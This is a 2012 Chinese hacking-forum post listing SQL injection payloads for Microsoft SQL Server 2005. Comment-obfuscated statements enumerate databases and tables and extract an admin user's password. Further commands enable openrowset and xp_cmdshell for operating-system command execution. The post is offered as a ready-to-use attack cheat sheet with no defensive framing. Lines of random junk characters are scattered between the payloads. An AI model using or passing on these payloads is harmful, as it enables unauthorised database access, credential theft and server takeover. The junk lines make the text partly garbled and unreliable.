中国网络渗透测试联盟
标题:
MSsql2005注入语句
[打印本页]
作者:
admin
时间:
2012-9-13 17:19
标题:
MSsql2005注入语句
8 t9 v6 M k& q/ d
0 H' Q( k- L, A% u6 F7 z7 C
' m' i, o3 R; D u
[Copy to clipboard]CODE:
2 c" r/ i K: q4 _& f$ [8 p. d
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
# ~- L/ _6 {, I5 L' ~8 i$ v- E
/ s s/ { H* M6 Y
爆表语句,somedb部份是所要列的数据库,红色数字1累加
8 Q! L I$ _& h1 z8 Q- ^4 E2 v
* D: F- W! q0 [
: a" G* Z' y8 R% w# Z" d/ ]; X" f
[Copy to clipboard]CODE:
6 I4 Z' p8 F& B
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
# }7 S$ }- B6 ]) X! f; O) |& z
+ u$ s( |7 Q7 e
爆字段语句,爆表admin里user='icerover'的密码段
( ~4 i1 l' W" ]& J( U
! j; J |6 V, Z0 O F7 M' l
4 M4 Q ~/ X0 v3 |
[Copy to clipboard]CODE:
9 p2 O% L, P" |" v* w" A
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
# A4 T6 [' m( [& T5 z
: @3 Q2 w1 l' [- P4 [/ A- S
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
4 M3 i" M: e% ]
如果是sa权限,可以这样来开启
! l/ r# Y4 i- \- J( x
开启openrowset
: g# d+ Q r# c( y
$ @! u4 l, E9 Y8 M, z
& h/ ~2 O) y+ |4 t# K) g2 j
[Copy to clipboard]CODE:
[+ Y7 M5 p, l. k) I ~. u3 [
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
1 k) c8 A& G6 D1 H" j( I" R
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
3 O8 p6 X" J: ^, x
* u8 l$ w" T' ]7 z2 Z0 }% i
开启xp_cmdshell
2 I% P3 {$ \, i2 ?0 U, @' g
- G2 q- y: k' @# K- J1 T8 S
& x9 |' _# x- ]+ l! R
[Copy to clipboard]CODE:
" h/ u3 h4 s7 g" z. p
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
! j3 H4 a1 [/ I/ W6 F
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
! }! z' b' ?% u6 }) `. p
/ T: k. u$ }! t4 y
ok,over~~晚安
# D" C- e0 w8 s% n1 |: c$ M
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2